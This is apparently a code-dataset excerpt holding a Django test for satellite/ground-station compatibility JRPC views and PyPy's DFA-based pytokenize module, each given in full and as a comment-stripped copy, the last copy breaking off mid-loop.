] | 2 | 2015-04-04T15:23:35.000Z | 2017-07-23T23:14:06.000Z |
import logging
from django import test
from services.common import helpers as db_tools
from services.scheduling.jrpc.views import compatibility as compatibility_jrpc
"""
Copyright 2015 Ricardo Tubio-Pardavila
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__author__ = 'rtubiopa@calpoly.edu'
class TestCompatibilityViews(test.TestCase):
    """
    Tests for the compatibility JRPC views
    """

    def setUp(self):
        """
        Populates the initial database with a set of objects required to run
        the following tests.
        """
        self.__verbose_testing = False

        if not self.__verbose_testing:
            logging.getLogger('configuration').setLevel(level=logging.CRITICAL)

        # Importing the module registers the compatibility signal handlers.
        # noinspection PyUnresolvedReferences
        from services.scheduling.signals import compatibility

        # Ground station with two channels in the same band.
        self.__gs_1_id = 'gs-castrelos'
        self.__gs_1_ch_1_id = 'chan-cas-1'
        self.__gs_1_ch_2_id = 'chan-cas-2'

        self.__band = db_tools.create_band()
        self.__user_profile = db_tools.create_user_profile()
        self.__gs_1 = db_tools.create_gs(
            user_profile=self.__user_profile, identifier=self.__gs_1_id,
        )
        self.__gs_1_ch_1 = db_tools.gs_add_channel(
            self.__gs_1, self.__band, self.__gs_1_ch_1_id
        )
        self.__gs_1_ch_2 = db_tools.gs_add_channel(
            self.__gs_1, self.__band, self.__gs_1_ch_2_id
        )

        # Spacecraft with a single GMSK channel at 437 MHz.
        self.__sc_1_id = 'humd'
        self.__sc_1_ch_1_id = 'gmsk-sc-1'
        self.__sc_1_ch_1_f = 437000000
        self.__sc_1_ch_2_id = 'gmsk-sc-2'
        self.__sc_1 = db_tools.create_sc(
            user_profile=self.__user_profile,
            identifier=self.__sc_1_id
        )
        self.__sc_1_ch_1 = db_tools.sc_add_channel(
            self.__sc_1, self.__sc_1_ch_1_f, self.__sc_1_ch_1_id,
        )

    def test_sc_channel_get_compatible(self):
        """JRPC test: configuration.sc.channel.getCompatible
        """
        if self.__verbose_testing:
            print('>>> TEST (test_sc_channel_get_compatible)')

        c = compatibility_jrpc.sc_channel_get_compatible(
            self.__sc_1_id, self.__sc_1_ch_1_id
        )
        # FIX: assertEquals is a deprecated alias removed in Python 3.12;
        # use assertEqual instead.
        self.assertEqual(c[0]['GroundStation']['identifier'], self.__gs_1_id)

    def test_sc_get_compatible(self):
        """JRPC test: configuration.sc.getCompatible
        """
        if self.__verbose_testing:
            print('>>> TEST (test_sc_get_compatible)')

        r = compatibility_jrpc.sc_get_compatible(self.__sc_1_id)
        self.assertEqual(
            r['spacecraft_id'], self.__sc_1_id
        )
        self.assertEqual(
            r['Compatibility'][0]['ScChannel']['identifier'], 'gmsk-sc-1',
        )
| 32.26 | 79 | 0.66491 |
import logging
from django import test
from services.common import helpers as db_tools
from services.scheduling.jrpc.views import compatibility as compatibility_jrpc
__author__ = 'rtubiopa@calpoly.edu'
class TestCompatibilityViews(test.TestCase):
    """Tests for the compatibility JRPC views."""

    def setUp(self):
        """Populate the database with the ground station / spacecraft
        objects required by the tests below.
        """
        self.__verbose_testing = False
        if not self.__verbose_testing:
            logging.getLogger('configuration').setLevel(level=logging.CRITICAL)
        # Importing the module registers the compatibility signal handlers.
        from services.scheduling.signals import compatibility
        # Ground station with two channels in the same band.
        self.__gs_1_id = 'gs-castrelos'
        self.__gs_1_ch_1_id = 'chan-cas-1'
        self.__gs_1_ch_2_id = 'chan-cas-2'
        self.__band = db_tools.create_band()
        self.__user_profile = db_tools.create_user_profile()
        self.__gs_1 = db_tools.create_gs(
            user_profile=self.__user_profile, identifier=self.__gs_1_id,
        )
        self.__gs_1_ch_1 = db_tools.gs_add_channel(
            self.__gs_1, self.__band, self.__gs_1_ch_1_id
        )
        self.__gs_1_ch_2 = db_tools.gs_add_channel(
            self.__gs_1, self.__band, self.__gs_1_ch_2_id
        )
        # Spacecraft with a single GMSK channel at 437 MHz.
        self.__sc_1_id = 'humd'
        self.__sc_1_ch_1_id = 'gmsk-sc-1'
        self.__sc_1_ch_1_f = 437000000
        self.__sc_1_ch_2_id = 'gmsk-sc-2'
        self.__sc_1 = db_tools.create_sc(
            user_profile=self.__user_profile,
            identifier=self.__sc_1_id
        )
        self.__sc_1_ch_1 = db_tools.sc_add_channel(
            self.__sc_1, self.__sc_1_ch_1_f, self.__sc_1_ch_1_id,
        )

    def test_sc_channel_get_compatible(self):
        """JRPC test: configuration.sc.channel.getCompatible."""
        if self.__verbose_testing:
            print('>>> TEST (test_sc_channel_get_compatible)')
        c = compatibility_jrpc.sc_channel_get_compatible(
            self.__sc_1_id, self.__sc_1_ch_1_id
        )
        # The only configured GS should be reported as compatible.
        self.assertEquals(c[0]['GroundStation']['identifier'], self.__gs_1_id)

    def test_sc_get_compatible(self):
        """JRPC test: configuration.sc.getCompatible."""
        if self.__verbose_testing:
            print('>>> TEST (test_sc_get_compatible)')
        r = compatibility_jrpc.sc_get_compatible(self.__sc_1_id)
        self.assertEquals(
            r['spacecraft_id'], self.__sc_1_id
        )
        self.assertEquals(
            r['Compatibility'][0]['ScChannel']['identifier'], 'gmsk-sc-1',
        )
| true | true |
1c33358672906e92d07484e42457ecde63e16919 | 11,221 | py | Python | pypy/interpreter/pyparser/pytokenize.py | m4sterchain/mesapy | ed546d59a21b36feb93e2309d5c6b75aa0ad95c9 | [
"Apache-2.0",
"OpenSSL"
] | 381 | 2018-08-18T03:37:22.000Z | 2022-02-06T23:57:36.000Z | pypy/interpreter/pyparser/pytokenize.py | m4sterchain/mesapy | ed546d59a21b36feb93e2309d5c6b75aa0ad95c9 | [
"Apache-2.0",
"OpenSSL"
] | 16 | 2018-09-22T18:12:47.000Z | 2022-02-22T20:03:59.000Z | pypy/interpreter/pyparser/pytokenize.py | m4sterchain/mesapy | ed546d59a21b36feb93e2309d5c6b75aa0ad95c9 | [
"Apache-2.0",
"OpenSSL"
] | 30 | 2018-08-20T03:16:34.000Z | 2022-01-12T17:39:22.000Z | # ______________________________________________________________________
"""Module pytokenize
THIS FILE WAS COPIED FROM pypy/module/parser/pytokenize.py AND ADAPTED
TO BE ANNOTABLE (Mainly made lists homogeneous)
This is a modified version of Ka-Ping Yee's tokenize module found in the
Python standard library.
The primary modification is the removal of the tokenizer's dependence on the
standard Python regular expression module, which is written in C. The regular
expressions have been replaced with hand built DFA's using the
basil.util.automata module.
$Id: pytokenize.py,v 1.3 2003/10/03 16:31:53 jriehl Exp $
"""
# ______________________________________________________________________
from pypy.interpreter.pyparser import automata
__all__ = [ "tokenize" ]
# ______________________________________________________________________
# Automatically generated DFA's
accepts = [True, True, True, True, True, True, True, True,
True, True, False, True, True, True, True, False,
False, False, True, False, False, True, False,
False, True, False, True, False, True, False,
False, True, False, False, True, True, True,
False, False, True, False, False, False, True]
states = [
# 0
{'\t': 0, '\n': 13, '\x0c': 0,
'\r': 14, ' ': 0, '!': 10, '"': 16,
'#': 18, '%': 12, '&': 12, "'": 15,
'(': 13, ')': 13, '*': 7, '+': 12,
',': 13, '-': 12, '.': 6, '/': 11,
'0': 4, '1': 5, '2': 5, '3': 5,
'4': 5, '5': 5, '6': 5, '7': 5,
'8': 5, '9': 5, ':': 13, ';': 13,
'<': 9, '=': 12, '>': 8, '@': 13,
'A': 1, 'B': 2, 'C': 1, 'D': 1,
'E': 1, 'F': 1, 'G': 1, 'H': 1,
'I': 1, 'J': 1, 'K': 1, 'L': 1,
'M': 1, 'N': 1, 'O': 1, 'P': 1,
'Q': 1, 'R': 3, 'S': 1, 'T': 1,
'U': 2, 'V': 1, 'W': 1, 'X': 1,
'Y': 1, 'Z': 1, '[': 13, '\\': 17,
']': 13, '^': 12, '_': 1, '`': 13,
'a': 1, 'b': 2, 'c': 1, 'd': 1,
'e': 1, 'f': 1, 'g': 1, 'h': 1,
'i': 1, 'j': 1, 'k': 1, 'l': 1,
'm': 1, 'n': 1, 'o': 1, 'p': 1,
'q': 1, 'r': 3, 's': 1, 't': 1,
'u': 2, 'v': 1, 'w': 1, 'x': 1,
'y': 1, 'z': 1, '{': 13, '|': 12,
'}': 13, '~': 13},
# 1
{'0': 1, '1': 1, '2': 1, '3': 1,
'4': 1, '5': 1, '6': 1, '7': 1,
'8': 1, '9': 1, 'A': 1, 'B': 1,
'C': 1, 'D': 1, 'E': 1, 'F': 1,
'G': 1, 'H': 1, 'I': 1, 'J': 1,
'K': 1, 'L': 1, 'M': 1, 'N': 1,
'O': 1, 'P': 1, 'Q': 1, 'R': 1,
'S': 1, 'T': 1, 'U': 1, 'V': 1,
'W': 1, 'X': 1, 'Y': 1, 'Z': 1,
'_': 1, 'a': 1, 'b': 1, 'c': 1,
'd': 1, 'e': 1, 'f': 1, 'g': 1,
'h': 1, 'i': 1, 'j': 1, 'k': 1,
'l': 1, 'm': 1, 'n': 1, 'o': 1,
'p': 1, 'q': 1, 'r': 1, 's': 1,
't': 1, 'u': 1, 'v': 1, 'w': 1,
'x': 1, 'y': 1, 'z': 1},
# 2
{'"': 16, "'": 15, '0': 1, '1': 1,
'2': 1, '3': 1, '4': 1, '5': 1,
'6': 1, '7': 1, '8': 1, '9': 1,
'A': 1, 'B': 1, 'C': 1, 'D': 1,
'E': 1, 'F': 1, 'G': 1, 'H': 1,
'I': 1, 'J': 1, 'K': 1, 'L': 1,
'M': 1, 'N': 1, 'O': 1, 'P': 1,
'Q': 1, 'R': 3, 'S': 1, 'T': 1,
'U': 1, 'V': 1, 'W': 1, 'X': 1,
'Y': 1, 'Z': 1, '_': 1, 'a': 1,
'b': 1, 'c': 1, 'd': 1, 'e': 1,
'f': 1, 'g': 1, 'h': 1, 'i': 1,
'j': 1, 'k': 1, 'l': 1, 'm': 1,
'n': 1, 'o': 1, 'p': 1, 'q': 1,
'r': 3, 's': 1, 't': 1, 'u': 1,
'v': 1, 'w': 1, 'x': 1, 'y': 1,
'z': 1},
# 3
{'"': 16, "'": 15, '0': 1, '1': 1,
'2': 1, '3': 1, '4': 1, '5': 1,
'6': 1, '7': 1, '8': 1, '9': 1,
'A': 1, 'B': 1, 'C': 1, 'D': 1,
'E': 1, 'F': 1, 'G': 1, 'H': 1,
'I': 1, 'J': 1, 'K': 1, 'L': 1,
'M': 1, 'N': 1, 'O': 1, 'P': 1,
'Q': 1, 'R': 1, 'S': 1, 'T': 1,
'U': 1, 'V': 1, 'W': 1, 'X': 1,
'Y': 1, 'Z': 1, '_': 1, 'a': 1,
'b': 1, 'c': 1, 'd': 1, 'e': 1,
'f': 1, 'g': 1, 'h': 1, 'i': 1,
'j': 1, 'k': 1, 'l': 1, 'm': 1,
'n': 1, 'o': 1, 'p': 1, 'q': 1,
'r': 1, 's': 1, 't': 1, 'u': 1,
'v': 1, 'w': 1, 'x': 1, 'y': 1,
'z': 1},
# 4
{'.': 24, '0': 21, '1': 21, '2': 21,
'3': 21, '4': 21, '5': 21, '6': 21,
'7': 21, '8': 23, '9': 23, 'B': 22,
'E': 25, 'J': 13, 'L': 13, 'O': 20,
'X': 19, 'b': 22, 'e': 25, 'j': 13,
'l': 13, 'o': 20, 'x': 19},
# 5
{'.': 24, '0': 5, '1': 5, '2': 5,
'3': 5, '4': 5, '5': 5, '6': 5,
'7': 5, '8': 5, '9': 5, 'E': 25,
'J': 13, 'L': 13, 'e': 25, 'j': 13,
'l': 13},
# 6
{'0': 26, '1': 26, '2': 26, '3': 26,
'4': 26, '5': 26, '6': 26, '7': 26,
'8': 26, '9': 26},
# 7
{'*': 12, '=': 13},
# 8
{'=': 13, '>': 12},
# 9
{'<': 12, '=': 13, '>': 13},
# 10
{'=': 13},
# 11
{'/': 12, '=': 13},
# 12
{'=': 13},
# 13
{},
# 14
{'\n': 13},
# 15
{automata.DEFAULT: 30, '\n': 27,
'\r': 27, "'": 28, '\\': 29},
# 16
{automata.DEFAULT: 33, '\n': 27,
'\r': 27, '"': 31, '\\': 32},
# 17
{'\n': 13, '\r': 14},
# 18
{automata.DEFAULT: 18, '\n': 27, '\r': 27},
# 19
{'0': 34, '1': 34, '2': 34, '3': 34,
'4': 34, '5': 34, '6': 34, '7': 34,
'8': 34, '9': 34, 'A': 34, 'B': 34,
'C': 34, 'D': 34, 'E': 34, 'F': 34,
'a': 34, 'b': 34, 'c': 34, 'd': 34,
'e': 34, 'f': 34},
# 20
{'0': 35, '1': 35, '2': 35, '3': 35,
'4': 35, '5': 35, '6': 35, '7': 35},
# 21
{'.': 24, '0': 21, '1': 21, '2': 21,
'3': 21, '4': 21, '5': 21, '6': 21,
'7': 21, '8': 23, '9': 23, 'E': 25,
'J': 13, 'L': 13, 'e': 25, 'j': 13,
'l': 13},
# 22
{'0': 36, '1': 36},
# 23
{'.': 24, '0': 23, '1': 23, '2': 23,
'3': 23, '4': 23, '5': 23, '6': 23,
'7': 23, '8': 23, '9': 23, 'E': 25,
'J': 13, 'e': 25, 'j': 13},
# 24
{'0': 24, '1': 24, '2': 24, '3': 24,
'4': 24, '5': 24, '6': 24, '7': 24,
'8': 24, '9': 24, 'E': 37, 'J': 13,
'e': 37, 'j': 13},
# 25
{'+': 38, '-': 38, '0': 39, '1': 39,
'2': 39, '3': 39, '4': 39, '5': 39,
'6': 39, '7': 39, '8': 39, '9': 39},
# 26
{'0': 26, '1': 26, '2': 26, '3': 26,
'4': 26, '5': 26, '6': 26, '7': 26,
'8': 26, '9': 26, 'E': 37, 'J': 13,
'e': 37, 'j': 13},
# 27
{},
# 28
{"'": 13},
# 29
{automata.DEFAULT: 40, '\n': 13, '\r': 14},
# 30
{automata.DEFAULT: 30, '\n': 27,
'\r': 27, "'": 13, '\\': 29},
# 31
{'"': 13},
# 32
{automata.DEFAULT: 41, '\n': 13, '\r': 14},
# 33
{automata.DEFAULT: 33, '\n': 27,
'\r': 27, '"': 13, '\\': 32},
# 34
{'0': 34, '1': 34, '2': 34, '3': 34,
'4': 34, '5': 34, '6': 34, '7': 34,
'8': 34, '9': 34, 'A': 34, 'B': 34,
'C': 34, 'D': 34, 'E': 34, 'F': 34,
'L': 13, 'a': 34, 'b': 34, 'c': 34,
'd': 34, 'e': 34, 'f': 34, 'l': 13},
# 35
{'0': 35, '1': 35, '2': 35, '3': 35,
'4': 35, '5': 35, '6': 35, '7': 35,
'L': 13, 'l': 13},
# 36
{'0': 36, '1': 36, 'L': 13, 'l': 13},
# 37
{'+': 42, '-': 42, '0': 43, '1': 43,
'2': 43, '3': 43, '4': 43, '5': 43,
'6': 43, '7': 43, '8': 43, '9': 43},
# 38
{'0': 39, '1': 39, '2': 39, '3': 39,
'4': 39, '5': 39, '6': 39, '7': 39,
'8': 39, '9': 39},
# 39
{'0': 39, '1': 39, '2': 39, '3': 39,
'4': 39, '5': 39, '6': 39, '7': 39,
'8': 39, '9': 39, 'J': 13, 'j': 13},
# 40
{automata.DEFAULT: 40, '\n': 27,
'\r': 27, "'": 13, '\\': 29},
# 41
{automata.DEFAULT: 41, '\n': 27,
'\r': 27, '"': 13, '\\': 32},
# 42
{'0': 43, '1': 43, '2': 43, '3': 43,
'4': 43, '5': 43, '6': 43, '7': 43,
'8': 43, '9': 43},
# 43
{'0': 43, '1': 43, '2': 43, '3': 43,
'4': 43, '5': 43, '6': 43, '7': 43,
'8': 43, '9': 43, 'J': 13, 'j': 13},
]
pseudoDFA = automata.DFA(states, accepts)
accepts = [False, False, False, False, False, True]
states = [
# 0
{automata.DEFAULT: 0, '"': 1, '\\': 2},
# 1
{automata.DEFAULT: 4, '"': 3, '\\': 2},
# 2
{automata.DEFAULT: 4},
# 3
{automata.DEFAULT: 4, '"': 5, '\\': 2},
# 4
{automata.DEFAULT: 4, '"': 1, '\\': 2},
# 5
{automata.DEFAULT: 4, '"': 5, '\\': 2},
]
double3DFA = automata.NonGreedyDFA(states, accepts)
accepts = [False, False, False, False, False, True]
states = [
# 0
{automata.DEFAULT: 0, "'": 1, '\\': 2},
# 1
{automata.DEFAULT: 4, "'": 3, '\\': 2},
# 2
{automata.DEFAULT: 4},
# 3
{automata.DEFAULT: 4, "'": 5, '\\': 2},
# 4
{automata.DEFAULT: 4, "'": 1, '\\': 2},
# 5
{automata.DEFAULT: 4, "'": 5, '\\': 2},
]
single3DFA = automata.NonGreedyDFA(states, accepts)
accepts = [False, True, False, False]
states = [
# 0
{automata.DEFAULT: 0, "'": 1, '\\': 2},
# 1
{},
# 2
{automata.DEFAULT: 3},
# 3
{automata.DEFAULT: 3, "'": 1, '\\': 2},
]
singleDFA = automata.DFA(states, accepts)
accepts = [False, True, False, False]
states = [
# 0
{automata.DEFAULT: 0, '"': 1, '\\': 2},
# 1
{},
# 2
{automata.DEFAULT: 3},
# 3
{automata.DEFAULT: 3, '"': 1, '\\': 2},
]
doubleDFA = automata.DFA(states, accepts)
#_______________________________________________________________________
# End of automatically generated DFA's
# Map from string-literal opener to the DFA that recognizes its terminator.
# Bare prefix letters map to None: they are not openers by themselves.
endDFAs = {"'" : singleDFA,
           '"' : doubleDFA,
           'r' : None,
           'R' : None,
           'u' : None,
           'U' : None,
           'b' : None,
           'B' : None}

# Register the triple-quote terminator DFAs for every legal combination of
# unicode/bytes prefix and raw prefix (e.g. "ur'''", 'bR"""', ...).
for uniPrefix in ("", "u", "U", "b", "B"):
    for rawPrefix in ("", "r", "R"):
        prefix = uniPrefix + rawPrefix
        endDFAs[prefix + "'''"] = single3DFA
        endDFAs[prefix + '"""'] = double3DFA

# One-state DFA accepting runs of intra-line whitespace
# (tab, space, form feed).
whiteSpaceStatesAccepts = [True]
whiteSpaceStates = [{'\t': 0, ' ': 0, '\x0c': 0}]
whiteSpaceDFA = automata.DFA(whiteSpaceStates, whiteSpaceStatesAccepts)

# ______________________________________________________________________
# COPIED:
# Membership tables (used as sets) of every recognized triple-quote and
# single-quote string opener, including all prefix combinations.
triple_quoted = {}
for t in ("'''", '"""',
          "r'''", 'r"""', "R'''", 'R"""',
          "u'''", 'u"""', "U'''", 'U"""',
          "b'''", 'b"""', "B'''", 'B"""',
          "ur'''", 'ur"""', "Ur'''", 'Ur"""',
          "uR'''", 'uR"""', "UR'''", 'UR"""',
          "br'''", 'br"""', "Br'''", 'Br"""',
          "bR'''", 'bR"""', "BR'''", 'BR"""'):
    triple_quoted[t] = t
single_quoted = {}
for t in ("'", '"',
          "r'", 'r"', "R'", 'R"',
          "u'", 'u"', "U'", 'U"',
          "b'", 'b"', "B'", 'B"',
          "ur'", 'ur"', "Ur'", 'Ur"',
          "uR'", 'uR"', "UR'", 'UR"',
          "br'", 'br"', "Br'", 'Br"',
          "bR'", 'bR"', "BR'", 'BR"'):
    single_quoted[t] = t

tabsize = 8  # tab stop width; consumers are not visible in this chunk — TODO confirm
# PYPY MODIFICATION: removed TokenError class as it's not needed here
# PYPY MODIFICATION: removed StopTokenizing class as it's not needed here
# PYPY MODIFICATION: removed printtoken() as it's not needed here
# PYPY MODIFICATION: removed tokenize() as it's not needed here
# PYPY MODIFICATION: removed tokenize_loop() as it's not needed here
# PYPY MODIFICATION: removed generate_tokens() as it was copied / modified
# in pythonlexer.py
# PYPY MODIFICATION: removed main() as it's not needed here
# ______________________________________________________________________
# End of pytokenize.py
| 29.843085 | 78 | 0.387131 |
from pypy.interpreter.pyparser import automata
__all__ = [ "tokenize" ]
accepts = [True, True, True, True, True, True, True, True,
True, True, False, True, True, True, True, False,
False, False, True, False, False, True, False,
False, True, False, True, False, True, False,
False, True, False, False, True, True, True,
False, False, True, False, False, False, True]
states = [
# 0
{'\t': 0, '\n': 13, '\x0c': 0,
'\r': 14, ' ': 0, '!': 10, '"': 16,
'#': 18, '%': 12, '&': 12, "'": 15,
'(': 13, ')': 13, '*': 7, '+': 12,
',': 13, '-': 12, '.': 6, '/': 11,
'0': 4, '1': 5, '2': 5, '3': 5,
'4': 5, '5': 5, '6': 5, '7': 5,
'8': 5, '9': 5, ':': 13, ';': 13,
'<': 9, '=': 12, '>': 8, '@': 13,
'A': 1, 'B': 2, 'C': 1, 'D': 1,
'E': 1, 'F': 1, 'G': 1, 'H': 1,
'I': 1, 'J': 1, 'K': 1, 'L': 1,
'M': 1, 'N': 1, 'O': 1, 'P': 1,
'Q': 1, 'R': 3, 'S': 1, 'T': 1,
'U': 2, 'V': 1, 'W': 1, 'X': 1,
'Y': 1, 'Z': 1, '[': 13, '\\': 17,
']': 13, '^': 12, '_': 1, '`': 13,
'a': 1, 'b': 2, 'c': 1, 'd': 1,
'e': 1, 'f': 1, 'g': 1, 'h': 1,
'i': 1, 'j': 1, 'k': 1, 'l': 1,
'm': 1, 'n': 1, 'o': 1, 'p': 1,
'q': 1, 'r': 3, 's': 1, 't': 1,
'u': 2, 'v': 1, 'w': 1, 'x': 1,
'y': 1, 'z': 1, '{': 13, '|': 12,
'}': 13, '~': 13},
# 1
{'0': 1, '1': 1, '2': 1, '3': 1,
'4': 1, '5': 1, '6': 1, '7': 1,
'8': 1, '9': 1, 'A': 1, 'B': 1,
'C': 1, 'D': 1, 'E': 1, 'F': 1,
'G': 1, 'H': 1, 'I': 1, 'J': 1,
'K': 1, 'L': 1, 'M': 1, 'N': 1,
'O': 1, 'P': 1, 'Q': 1, 'R': 1,
'S': 1, 'T': 1, 'U': 1, 'V': 1,
'W': 1, 'X': 1, 'Y': 1, 'Z': 1,
'_': 1, 'a': 1, 'b': 1, 'c': 1,
'd': 1, 'e': 1, 'f': 1, 'g': 1,
'h': 1, 'i': 1, 'j': 1, 'k': 1,
'l': 1, 'm': 1, 'n': 1, 'o': 1,
'p': 1, 'q': 1, 'r': 1, 's': 1,
't': 1, 'u': 1, 'v': 1, 'w': 1,
'x': 1, 'y': 1, 'z': 1},
# 2
{'"': 16, "'": 15, '0': 1, '1': 1,
'2': 1, '3': 1, '4': 1, '5': 1,
'6': 1, '7': 1, '8': 1, '9': 1,
'A': 1, 'B': 1, 'C': 1, 'D': 1,
'E': 1, 'F': 1, 'G': 1, 'H': 1,
'I': 1, 'J': 1, 'K': 1, 'L': 1,
'M': 1, 'N': 1, 'O': 1, 'P': 1,
'Q': 1, 'R': 3, 'S': 1, 'T': 1,
'U': 1, 'V': 1, 'W': 1, 'X': 1,
'Y': 1, 'Z': 1, '_': 1, 'a': 1,
'b': 1, 'c': 1, 'd': 1, 'e': 1,
'f': 1, 'g': 1, 'h': 1, 'i': 1,
'j': 1, 'k': 1, 'l': 1, 'm': 1,
'n': 1, 'o': 1, 'p': 1, 'q': 1,
'r': 3, 's': 1, 't': 1, 'u': 1,
'v': 1, 'w': 1, 'x': 1, 'y': 1,
'z': 1},
# 3
{'"': 16, "'": 15, '0': 1, '1': 1,
'2': 1, '3': 1, '4': 1, '5': 1,
'6': 1, '7': 1, '8': 1, '9': 1,
'A': 1, 'B': 1, 'C': 1, 'D': 1,
'E': 1, 'F': 1, 'G': 1, 'H': 1,
'I': 1, 'J': 1, 'K': 1, 'L': 1,
'M': 1, 'N': 1, 'O': 1, 'P': 1,
'Q': 1, 'R': 1, 'S': 1, 'T': 1,
'U': 1, 'V': 1, 'W': 1, 'X': 1,
'Y': 1, 'Z': 1, '_': 1, 'a': 1,
'b': 1, 'c': 1, 'd': 1, 'e': 1,
'f': 1, 'g': 1, 'h': 1, 'i': 1,
'j': 1, 'k': 1, 'l': 1, 'm': 1,
'n': 1, 'o': 1, 'p': 1, 'q': 1,
'r': 1, 's': 1, 't': 1, 'u': 1,
'v': 1, 'w': 1, 'x': 1, 'y': 1,
'z': 1},
# 4
{'.': 24, '0': 21, '1': 21, '2': 21,
'3': 21, '4': 21, '5': 21, '6': 21,
'7': 21, '8': 23, '9': 23, 'B': 22,
'E': 25, 'J': 13, 'L': 13, 'O': 20,
'X': 19, 'b': 22, 'e': 25, 'j': 13,
'l': 13, 'o': 20, 'x': 19},
# 5
{'.': 24, '0': 5, '1': 5, '2': 5,
'3': 5, '4': 5, '5': 5, '6': 5,
'7': 5, '8': 5, '9': 5, 'E': 25,
'J': 13, 'L': 13, 'e': 25, 'j': 13,
'l': 13},
# 6
{'0': 26, '1': 26, '2': 26, '3': 26,
'4': 26, '5': 26, '6': 26, '7': 26,
'8': 26, '9': 26},
# 7
{'*': 12, '=': 13},
# 8
{'=': 13, '>': 12},
# 9
{'<': 12, '=': 13, '>': 13},
# 10
{'=': 13},
# 11
{'/': 12, '=': 13},
# 12
{'=': 13},
# 13
{},
# 14
{'\n': 13},
# 15
{automata.DEFAULT: 30, '\n': 27,
'\r': 27, "'": 28, '\\': 29},
# 16
{automata.DEFAULT: 33, '\n': 27,
'\r': 27, '"': 31, '\\': 32},
# 17
{'\n': 13, '\r': 14},
# 18
{automata.DEFAULT: 18, '\n': 27, '\r': 27},
# 19
{'0': 34, '1': 34, '2': 34, '3': 34,
'4': 34, '5': 34, '6': 34, '7': 34,
'8': 34, '9': 34, 'A': 34, 'B': 34,
'C': 34, 'D': 34, 'E': 34, 'F': 34,
'a': 34, 'b': 34, 'c': 34, 'd': 34,
'e': 34, 'f': 34},
# 20
{'0': 35, '1': 35, '2': 35, '3': 35,
'4': 35, '5': 35, '6': 35, '7': 35},
# 21
{'.': 24, '0': 21, '1': 21, '2': 21,
'3': 21, '4': 21, '5': 21, '6': 21,
'7': 21, '8': 23, '9': 23, 'E': 25,
'J': 13, 'L': 13, 'e': 25, 'j': 13,
'l': 13},
# 22
{'0': 36, '1': 36},
# 23
{'.': 24, '0': 23, '1': 23, '2': 23,
'3': 23, '4': 23, '5': 23, '6': 23,
'7': 23, '8': 23, '9': 23, 'E': 25,
'J': 13, 'e': 25, 'j': 13},
# 24
{'0': 24, '1': 24, '2': 24, '3': 24,
'4': 24, '5': 24, '6': 24, '7': 24,
'8': 24, '9': 24, 'E': 37, 'J': 13,
'e': 37, 'j': 13},
# 25
{'+': 38, '-': 38, '0': 39, '1': 39,
'2': 39, '3': 39, '4': 39, '5': 39,
'6': 39, '7': 39, '8': 39, '9': 39},
# 26
{'0': 26, '1': 26, '2': 26, '3': 26,
'4': 26, '5': 26, '6': 26, '7': 26,
'8': 26, '9': 26, 'E': 37, 'J': 13,
'e': 37, 'j': 13},
# 27
{},
# 28
{"'": 13},
{automata.DEFAULT: 40, '\n': 13, '\r': 14},
{automata.DEFAULT: 30, '\n': 27,
'\r': 27, "'": 13, '\\': 29},
# 31
{'"': 13},
# 32
{automata.DEFAULT: 41, '\n': 13, '\r': 14},
# 33
{automata.DEFAULT: 33, '\n': 27,
'\r': 27, '"': 13, '\\': 32},
# 34
{'0': 34, '1': 34, '2': 34, '3': 34,
'4': 34, '5': 34, '6': 34, '7': 34,
'8': 34, '9': 34, 'A': 34, 'B': 34,
'C': 34, 'D': 34, 'E': 34, 'F': 34,
'L': 13, 'a': 34, 'b': 34, 'c': 34,
'd': 34, 'e': 34, 'f': 34, 'l': 13},
# 35
{'0': 35, '1': 35, '2': 35, '3': 35,
'4': 35, '5': 35, '6': 35, '7': 35,
'L': 13, 'l': 13},
# 36
{'0': 36, '1': 36, 'L': 13, 'l': 13},
# 37
{'+': 42, '-': 42, '0': 43, '1': 43,
'2': 43, '3': 43, '4': 43, '5': 43,
'6': 43, '7': 43, '8': 43, '9': 43},
# 38
{'0': 39, '1': 39, '2': 39, '3': 39,
'4': 39, '5': 39, '6': 39, '7': 39,
'8': 39, '9': 39},
# 39
{'0': 39, '1': 39, '2': 39, '3': 39,
'4': 39, '5': 39, '6': 39, '7': 39,
'8': 39, '9': 39, 'J': 13, 'j': 13},
# 40
{automata.DEFAULT: 40, '\n': 27,
'\r': 27, "'": 13, '\\': 29},
{automata.DEFAULT: 41, '\n': 27,
'\r': 27, '"': 13, '\\': 32},
# 42
{'0': 43, '1': 43, '2': 43, '3': 43,
'4': 43, '5': 43, '6': 43, '7': 43,
'8': 43, '9': 43},
# 43
{'0': 43, '1': 43, '2': 43, '3': 43,
'4': 43, '5': 43, '6': 43, '7': 43,
'8': 43, '9': 43, 'J': 13, 'j': 13},
]
pseudoDFA = automata.DFA(states, accepts)
accepts = [False, False, False, False, False, True]
states = [
# 0
{automata.DEFAULT: 0, '"': 1, '\\': 2},
{automata.DEFAULT: 4, '"': 3, '\\': 2},
# 2
{automata.DEFAULT: 4},
# 3
{automata.DEFAULT: 4, '"': 5, '\\': 2},
{automata.DEFAULT: 4, '"': 1, '\\': 2},
# 5
{automata.DEFAULT: 4, '"': 5, '\\': 2},
]
double3DFA = automata.NonGreedyDFA(states, accepts)
accepts = [False, False, False, False, False, True]
states = [
{automata.DEFAULT: 0, "'": 1, '\\': 2},
# 1
{automata.DEFAULT: 4, "'": 3, '\\': 2},
{automata.DEFAULT: 4},
{automata.DEFAULT: 4, "'": 5, '\\': 2},
# 4
{automata.DEFAULT: 4, "'": 1, '\\': 2},
{automata.DEFAULT: 4, "'": 5, '\\': 2},
]
single3DFA = automata.NonGreedyDFA(states, accepts)
accepts = [False, True, False, False]
states = [
# 0
{automata.DEFAULT: 0, "'": 1, '\\': 2},
{},
{automata.DEFAULT: 3},
{automata.DEFAULT: 3, "'": 1, '\\': 2},
]
singleDFA = automata.DFA(states, accepts)
accepts = [False, True, False, False]
states = [
# 0
{automata.DEFAULT: 0, '"': 1, '\\': 2},
# 1
{},
# 2
{automata.DEFAULT: 3},
# 3
{automata.DEFAULT: 3, '"': 1, '\\': 2},
]
doubleDFA = automata.DFA(states, accepts)
#_______________________________________________________________________
# End of automatically generated DFA's
endDFAs = {"'" : singleDFA,
'"' : doubleDFA,
'r' : None,
'R' : None,
'u' : None,
'U' : None,
'b' : None,
'B' : None}
for uniPrefix in ("", "u", "U", "b", "B"):
for rawPrefix in ("", "r", "R"):
